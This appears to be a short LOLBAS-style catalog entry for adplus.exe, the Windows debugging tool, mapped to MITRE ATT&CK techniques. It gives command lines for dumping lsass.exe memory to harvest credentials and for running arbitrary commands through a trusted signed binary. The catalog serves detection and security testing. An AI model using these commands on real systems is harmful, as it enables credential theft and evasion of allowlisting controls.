adplus.exe
Debugging tool included with Windows Debugging Tools
Dump
Create memory dump and parse it offline
adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet
Creates a memory dump of the lsass process — MITRE: T1003.001 — Privileges: SYSTEM
Run commands under a trusted Microsoft signed binary
adplus.exe -c {PATH:.xml}
Dump process memory using an adplus config file (see the Resources section for a sample file). — MITRE: T1003.001 — Privileges: SYSTEM
Execute
Run commands under a trusted Microsoft signed binary
adplus.exe -c {PATH:.xml}
Execute arbitrary commands using an adplus config file (see the Resources section for a sample file). — MITRE: T1127 — Privileges: User
Run commands under a trusted Microsoft signed binary
adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}
Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. — MITRE: T1127 — Privileges: User